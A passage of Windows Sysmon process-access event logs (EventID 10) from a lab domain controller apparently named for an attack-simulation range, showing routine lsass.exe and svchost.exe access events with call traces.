{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2396,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.235\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001087BC0200}\r\nTargetProcessId: 2888\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.235","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001087BC0200}","TargetProcessId":"2888","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2397,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.313\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001087BC0200}\r\nTargetProcessId: 2888\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31375|C:\\Windows\\system32\\lsasrv.dll+2f20b|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.313","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001087BC0200}","TargetProcessId":"2888","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31375|C:\\Windows\\system32\\lsasrv.dll+2f20b|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2398,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.673\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F5F-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.673","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F5F-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2399,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.673\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001050C20200}\r\nTargetProcessId: 2352\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.673","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001050C20200}","TargetProcessId":"2352","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2400,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.673\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001050C20200}\r\nTargetProcessId: 2352\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.673","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001050C20200}","TargetProcessId":"2352","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2401,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.688\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F5F-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.688","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F5F-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2402,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2403,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 